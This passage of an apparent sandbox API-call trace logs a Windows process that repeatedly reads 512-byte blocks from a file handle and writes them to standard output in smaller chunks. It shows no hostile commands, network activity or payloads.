out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.860] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.860] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] GetFileType (hFile=0x50) returned 0x1 [0129.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.860] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.861] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.861] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] GetFileType (hFile=0x50) returned 0x1 [0129.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.861] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.862] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.862] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] GetFileType (hFile=0x50) returned 0x1 [0129.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.862] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] GetFileType (hFile=0x50) returned 0x1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] GetFileType (hFile=0x50) returned 0x1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] GetFileType (hFile=0x50) returned 0x1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.863] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.863] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] GetFileType (hFile=0x50) returned 0x1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] GetFileType (hFile=0x50) returned 0x1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] GetFileType (hFile=0x50) returned 0x1 [0129.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.863] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.864] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.864] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.865] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.865] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.866] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.866] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.867] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.867] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle 